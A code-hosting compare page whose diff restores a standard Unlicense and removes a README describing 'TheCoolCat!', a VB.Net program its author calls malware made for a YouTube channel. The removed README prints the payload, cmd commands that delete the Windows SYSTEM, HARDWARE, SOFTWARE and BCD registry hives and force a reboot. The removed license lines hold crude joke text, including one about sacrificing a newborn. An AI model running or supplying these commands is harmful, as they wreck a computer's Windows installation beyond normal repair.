Compare commits
No commits in common. "main" and "Release" have entirely different histories.
2 changed files with 5 additions and 52 deletions
|
|
@ -1,6 +1,7 @@
|
||||||
This is free and unencumbered software released into the public domain.
|
This is free and unencumbered software released into the public domain.
|
||||||
|
|
||||||
Anyone is free to copy, modify, publish, use, compile, sell, distribute, or use this software in any kind of satanic rituals, either in source code form or as a compiled
|
Anyone is free to copy, modify, publish, use, compile, sell, or
|
||||||
|
distribute this software, either in source code form or as a compiled
|
||||||
binary, for any purpose, commercial or non-commercial, and by any
|
binary, for any purpose, commercial or non-commercial, and by any
|
||||||
means.
|
means.
|
||||||
|
|
||||||
|
|
@ -12,8 +13,6 @@ successors. We intend this dedication to be an overt act of
|
||||||
relinquishment in perpetuity of all present and future rights to this
|
relinquishment in perpetuity of all present and future rights to this
|
||||||
software under copyright law.
|
software under copyright law.
|
||||||
|
|
||||||
Your soul is mine, and your computer too, so you can't complain me for any damage caused to your computer
|
|
||||||
|
|
||||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
|
||||||
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
|
||||||
|
|
@ -21,4 +20,5 @@ IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
|
||||||
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
|
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
|
||||||
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
|
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
|
||||||
OTHER DEALINGS IN THE SOFTWARE.
|
OTHER DEALINGS IN THE SOFTWARE.
|
||||||
or more information, please sacrifice a newborn child in the last hour of the last night of September while installing TheCoolCat! in your computer, then you'll be able to talk with our support.
|
|
||||||
|
For more information, please refer to <https://unlicense.org>
|
||||||
|
|
|
||||||
49
README.md
49
README.md
|
|
@ -1,48 +1 @@
|
||||||
<div>
|
# TheCoolCat-3.5
|
||||||
<img src="https://github.com/adrianvic/TheCoolCat-3.5/assets/85490958/e67251e6-2ad0-4b8e-9386-ca1011694a9c" title="Haruma" alt="Haruma" width="100" height="100" align="left"/>
|
|
||||||
<h1>TheCoolCat!</h1>
|
|
||||||
</div>
|
|
||||||
|
|
||||||
TheCoolCat! is basically a **malware** that I made for my (old) [malware](https://www.youtube.com/@pisica_obraznica) channel.
|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
|
|
||||||
## What it does
|
|
||||||
It just deletes the windows registry and shows messageboxes until your computer crash or restart with the shutdown command
|
|
||||||
|
|
||||||
## How it works
|
|
||||||
I made it in jan 2022 (wow it's ~2 years old) and I was very dumb with programming, so I made it in VB.Net for convenience and just executed some CMD commands for the payload
|
|
||||||
> Shell("cmd.exe /c reg delete HKLM\SYSTEM /f")
|
|
||||||
>
|
|
||||||
> Shell("cmd.exe /c reg delete HKLM\HARDWARE /f")
|
|
||||||
>
|
|
||||||
> Shell("cmd.exe /c reg delete HKLM\SOFTWARE /f")
|
|
||||||
>
|
|
||||||
> Shell("cmd.exe /c reg delete HKLM\BCD00000000 /f")
|
|
||||||
>
|
|
||||||
> Shell("cmd.exe /c shutdown -r -t 20")
|
|
||||||
>
|
|
||||||
> MessageBox.Show("", "", MessageBoxButtons.AbortRetryIgnore)
|
|
||||||
|
|
||||||
## What happens after restarting
|
|
||||||
An infinite "Diagnosing your PC"
|
|
||||||
<div>
|
|
||||||
<img src="https://github.com/adrianvic/TheCoolCat-3.5/assets/85490958/4c35c0a3-481c-4319-9fae-77ac9d887179" title="Error" alt="Error" width="500" height="250" align="center"/>
|
|
||||||
</div>
|
|
||||||
|
|
||||||
## Can I recover a PC after the payload?
|
|
||||||
If you have a backup of your registry, otherwize your best move is reinstall Windows. But if you ran it and want to close, you can always force close on the admin panel by clicking on the secret link and putting the user and password "admin":
|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
|
|
||||||
## Why it's TheCoolCat 3.5?
|
|
||||||
It has 3 versions: version 1.0 & 2.0 are shown on my video, but this is the third version, with nothing really new but an acceptable interface
|
|
||||||
|
|
||||||
## HEY YOUR IDIOT MY PC DOESN'T BOOT ANYMORE DO SOMETHING
|
|
||||||

|
|
||||||
|
|
||||||
No?
|
|
||||||
|
|
|
||||||
Reference in a new issue